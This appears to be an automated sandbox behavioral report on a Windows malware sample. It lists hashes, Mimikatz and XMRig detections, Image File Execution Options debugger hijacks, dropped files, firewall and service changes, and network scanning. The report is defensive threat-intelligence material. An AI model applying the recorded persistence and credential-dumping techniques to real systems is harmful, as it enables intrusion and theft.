Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-10-2024 09:54
Behavioral task
behavioral1
Sample
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe
Resource
win10v2004-20241007-en
General
-
Target
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe
-
Size
9.7MB
-
MD5
41891c6c8200e3450b9c393b75e95260
-
SHA1
be8cb2b9adce1b9aa2b686248b9246ae4ae75429
-
SHA256
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6e
-
SHA512
8d2df8e5bb920d0390487b97eac409c48a8f72586ff3191fa2009d1736df818691a219be8a9017504b3e65b3748f88de6d23e7565775d7f027e318de42f1d8c1
-
SSDEEP
196608:7po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:agjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
byuzvnr.exedescription pid Process procid_target PID 4652 created 2116 4652 byuzvnr.exe 37 -
Contacts a large (13780) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 9 IoCs
Processes:
resource yara_rule behavioral2/memory/2964-179-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig behavioral2/memory/2964-184-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig behavioral2/memory/2964-201-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig behavioral2/memory/2964-215-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig behavioral2/memory/2964-228-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig behavioral2/memory/2964-237-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig behavioral2/memory/2964-253-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig behavioral2/memory/2964-260-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig behavioral2/memory/2964-269-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/2212-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2212-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0009000000023bcf-6.dat mimikatz behavioral2/memory/4940-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/452-138-0x00007FF6238B0000-0x00007FF62399E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
Processes:
byuzvnr.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts byuzvnr.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
byuzvnr.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 4348 netsh.exe 2860 netsh.exe -
Executes dropped EXE 28 IoCs
Processes:
byuzvnr.exebyuzvnr.exewpcap.exebenegiqll.exevfshost.exelllgdyunt.exexohudmc.exebgzdci.exeuieubf.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exebyuzvnr.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exeruznevtjd.exepid Process 4940 byuzvnr.exe 4652 byuzvnr.exe 5084 wpcap.exe 2096 benegiqll.exe 452 vfshost.exe 3756 lllgdyunt.exe 2956 xohudmc.exe 4280 bgzdci.exe 2964 uieubf.exe 452 lllgdyunt.exe 4116 lllgdyunt.exe 2424 lllgdyunt.exe 3872 lllgdyunt.exe 4136 lllgdyunt.exe 920 lllgdyunt.exe 3980 lllgdyunt.exe 1676 lllgdyunt.exe 4392 lllgdyunt.exe 1468 lllgdyunt.exe 5104 byuzvnr.exe 4412 lllgdyunt.exe 4516 lllgdyunt.exe 3180 lllgdyunt.exe 2308 lllgdyunt.exe 2616 lllgdyunt.exe 1532 lllgdyunt.exe 2868 lllgdyunt.exe 704 ruznevtjd.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebenegiqll.exepid Process 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 5084 wpcap.exe 2096 benegiqll.exe 2096 benegiqll.exe 2096 benegiqll.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 83 ifconfig.me 84 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
xohudmc.exebyuzvnr.exewpcap.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\bgzdci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft byuzvnr.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\bgzdci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData byuzvnr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF byuzvnr.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF byuzvnr.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content byuzvnr.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023c9a-134.dat upx behavioral2/memory/452-135-0x00007FF6238B0000-0x00007FF62399E000-memory.dmp upx behavioral2/memory/452-138-0x00007FF6238B0000-0x00007FF62399E000-memory.dmp upx behavioral2/files/0x0007000000023ca5-141.dat upx behavioral2/memory/3756-142-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/3756-160-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/files/0x0007000000023ca2-164.dat upx behavioral2/memory/2964-165-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/452-172-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/4116-176-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2964-179-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/2424-182-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2964-184-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/3872-187-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/4136-191-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/920-195-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/3980-199-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2964-201-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/1676-204-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/4392-209-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/1468-213-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2964-215-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/4412-222-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/4516-226-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2964-228-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/3180-231-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2308-234-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2616-236-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2964-237-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/1532-239-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2868-241-0x00007FF737350000-0x00007FF7373AB000-memory.dmp upx behavioral2/memory/2964-253-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/2964-260-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx behavioral2/memory/2964-269-0x00007FF6A2300000-0x00007FF6A2420000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exebyuzvnr.exeruznevtjd.execmd.exedescription ioc Process File opened for modification C:\Windows\klhnlzly\byuzvnr.exe d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe File created C:\Windows\hgpuenbvt\lzvztyutv\Packet.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\tucl-1.dll byuzvnr.exe File created C:\Windows\klhnlzly\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\cnli-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\exma-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\docmicfg.exe byuzvnr.exe File opened for modification C:\Windows\klhnlzly\vimpcsvc.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\trfo-2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\spoolsrv.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\wpcap.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\schoedcl.exe byuzvnr.exe File created C:\Windows\klhnlzly\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\schoedcl.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\ip.txt byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\scan.bat byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\lzvztyutv\Result.txt ruznevtjd.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\tibe-2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\zlib1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\docmicfg.xml byuzvnr.exe File created C:\Windows\klhnlzly\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\Shellcode.ini byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\AppCapture32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\libxml2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\vfshost.exe byuzvnr.exe File created C:\Windows\klhnlzly\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\libeay32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\upbdrjv\swrpwe.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\ruznevtjd.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\vimpcsvc.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\posh-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\ssleay32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\svschost.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\mimilib.dll byuzvnr.exe File created C:\Windows\ime\byuzvnr.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\trch-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\mimidrv.sys byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\crli-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\ucl.dll byuzvnr.exe File opened for modification C:\Windows\klhnlzly\svschost.xml byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\Corporate\log.txt cmd.exe File created C:\Windows\klhnlzly\byuzvnr.exe d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\xdvl-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\vimpcsvc.exe byuzvnr.exe File created C:\Windows\klhnlzly\vimpcsvc.xml byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\lzvztyutv\Packet.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\coli-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\vimpcsvc.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\AppCapture64.dll byuzvnr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 4504 sc.exe 2476 sc.exe 1756 sc.exe 5064 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
netsh.execmd.execmd.exenet.exenet1.exenetsh.exenet.exenetsh.exenet1.execmd.execmd.exenetsh.exenet.exesc.exebgzdci.exewpcap.exebenegiqll.exeschtasks.exenetsh.execmd.exenetsh.execacls.execmd.execmd.exenet.exenet1.execmd.exenet.execmd.exenetsh.exesc.execmd.exenetsh.exenet1.exenet.exeschtasks.exexohudmc.execmd.exenetsh.execmd.execmd.exesc.exeruznevtjd.execacls.execmd.execmd.execmd.exenet1.exenetsh.execmd.execmd.execmd.exePING.EXEbyuzvnr.execacls.exenetsh.exenetsh.exenetsh.execmd.exed4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.execmd.execmd.exenet1.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 